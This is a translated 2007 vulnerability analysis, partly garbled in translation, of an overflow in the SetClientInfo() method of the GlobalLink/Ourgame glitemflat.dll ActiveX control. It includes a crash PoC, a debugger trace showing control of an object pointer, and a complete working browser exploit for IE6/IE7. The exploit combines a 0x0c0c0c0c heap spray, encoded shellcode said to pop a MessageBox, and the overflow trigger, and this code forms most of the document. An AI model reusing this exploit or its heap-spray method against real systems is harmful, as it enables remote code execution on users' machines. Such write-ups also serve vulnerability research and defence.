GlobalLink glitemflat.dll SetClientInfo() overflow analysis-vulnerability warning-the black bar safety net

2007-09-08T00:00:00
ID MYHACK58:62200716840
Type myhack58
Reporter 佚名
Modified 2007-09-08T00:00:00

Description

Affected version: Lianzhong game lobby 2. 7. 0. 8 (2 0 0 7 years 8 months 1 6, released)

Unaffected version: Ourgame also didn't fill :-)

Brief analysis: Prior to the PoC code:

<OBJECT id=target classid=clsid:7D1425D4-E2FC-4A52-BDA9-B9DCAC5EF574></OBJECT> <SCRIPT> s="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" target. SetClientInfo(1, s, 1) </SCRIPT>

Running the PoC,use ollydbg to catch exceptions:for Read[4 1 4 1 4 1 4 5]invalid address access exception,the problem code is as follows:

033D9315 |> \8B86 DC000000 MOV EAX,DWORD PTR DS:[ESI+DC] 033D931B |. 85C0 TEST EAX,EAX 033D931D |. 7 4 3 4 JE SHORT 033D9353 033D931F | . FF70 0 4 PUSH DWORD PTR DS:[EAX +4] ; /hWnd <=== exception! 033D9322 |. FF15 F8523F03 CALL DWORD PTR DS:[<&USER32. IsWindow>] ; \IsWindow

Then look at this register:

EAX 4 1 4 1 4 1 4 1 ECX 0 3 4 4 2 0 7 0 EDX 006900CD ASCII "ox" EBX 0 3 4 4 2 0 7 0 ESP 02B9FB2C EBP 02B9FB48 ESI 03441FD0 EDI 0344210C EIP 033D931F glitemfl. 033D931F

EAX is"AAAA",it seems that we can control the EAX value,but here we also can't control the instruction flow towards,to look down:

033D9328 |. 85C0 TEST EAX,EAX 033D932A | . 7 4 0F JE SHORT 033D933B ; eax is 0,Skip to 0x033D933B 033D932C |. 8B86 DC000000 MOV EAX,DWORD PTR DS:[ESI+DC] 033D9332 |. FF70 0 4 PUSH DWORD PTR DS:[EAX+4] ; /hWnd 033D9335 |. FF15 44533F03 CALL DWORD PTR DS:[<&USER32. DestroyWindo>; \DestroyWindow 033D933B |> 8B8E DC000000 MOV ECX,DWORD PTR DS:[ESI+DC] ; ecx is our front control the eax value 033D9341 |. 85C9 TEST ECX,ECX 033D9343 | . 7 4 0 7 JE SHORT 033D934C ; if ECX is not equal to 0,Do not jump 033D9345 |. 8B01 MOV EAX,DWORD PTR DS:[ECX] 033D9347 |. 6A 0 1 PUSH 1 033D9349 | . FF50 0C CALL DWORD PTR DS:[EAX+C] ; virtual function calls,may control 033D934C |> 83A6 DC000000>AND DWORD PTR DS:[ESI+DC],0 033D9353 |> 8D86 4 0 0 1 0 0 0 0 LEA EAX,DWORD PTR DS:[ESI+1 4 0]

From the above code flow analysis can be seen[ESI+DC]actually putting an object pointer,and can be our control. This object structure is substantially as follows:

+00h vmt_ptr +04h hWnd +08h ...

To use successful,must be such that put the hWnd of the address can be read,and read out the hWnd is an invalid window handle,you can control the flow to the 0x033D933B,then that vmt_ptr points to address offset 0x0C of the address to our shellcode,OK.

What looks,these conditions are difficult to meet,but don't forget we are in IE inside,dishing out the heap spray law,and then cover the object the pointer points to 0x0c0c0c0c. In this case,the hWnd of 0x0c0c0c0c,the Basic for the invalid handle,if it happens to be the window handle,congratulations to you,go buy a lottery ticket.; vmt_ptr is also this value,vmt_ptr+0x0c or this value,the final call [eax+C]get control.

Demo code: (shellcode as a pop-up MessageBox, IE6sp2,IE7 to test by)

<OBJECT id=target classid=clsid:7D1425D4-E2FC-4A52-BDA9-B9DCAC5EF574></OBJECT> <SCRIPT> document. write("<meta http-equiv=\"refresh\" content=\"1," + window. location. href + "\"></meta>"); var heapSprayToAddress = 0x0c0c0c0c; var shellcode = unescape( //just pop up a MessageBox "%u0eeb%u4b5b%uc933%ubfb1%u3480%ufe0b%ufae2%u05eb%uede8%uffff%u17ff%ufe67%ufefe%u94a1%ua7ce%u759a%u75ff%uf2be%u8e75%u53e2%u9675%u75f6%u9409%ua7fc%uc716%ufefe%u1cfe%u9607%ucccd%ufefe%u8b96%u9b8d%uaa8c%ue801%u166b%ufeda%ufefe%u96ac%u91d0%u998c%u9096%uce8a%u9693%u8edd%uca96%u8896%u9791%u759a%u7322%uf2b8%uadac%uacae%ua801%u01f6%ufaa8%ua8af%u8b75%u75c2%ud08a% ufd86%ua80b%u8875%ufdde%ucd0b%ub737%u53bf%u3bfd%u25cd%u40f1%uc4ee%u8a28%u3ff6%uf935%u24fd%u15be%uc50f%u8be1%ua019%ua075%ufdda%u9823%uf275%u75b5%ue2a0%u23fd%ufa75%ufd75%u553b%ua7a0%u163d%u019c%u0101%u8acc%uf26f%u7187%u9e32%uf494%ue0c6%u3344%u4d2e%u3a4b%u968d%u929b%u9d92%u9a91%ufe9b" );

var heapBlockSize = 0x100000; var payLoadSize = shellcode. length * 2; var spraySlideSize = heapBlockSize - (payLoadSize+0x38); var spraySlide = unescape("%u0c0c%u0c0c"); spraySlide = getSpraySlide(spraySlide,spraySlideSize); heapBlocks = (heapSprayToAddress - 0x100000)/heapBlockSize; memory = new Array();

for (i=0;i<heapBlocks;i++) { memory[i] = spraySlide + shellcode; }

function getSpraySlide(spraySlide, spraySlideSize) { while (spraySlide. length*2<spraySlideSize) { spraySlide += spraySlide; } spraySlide = spraySlide. substring(0,spraySlideSize/2); return spraySlide; }

s="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\x0c\x0c\x0c\x0c" target. SetClientInfo(1, s, 1) </SCRIPT>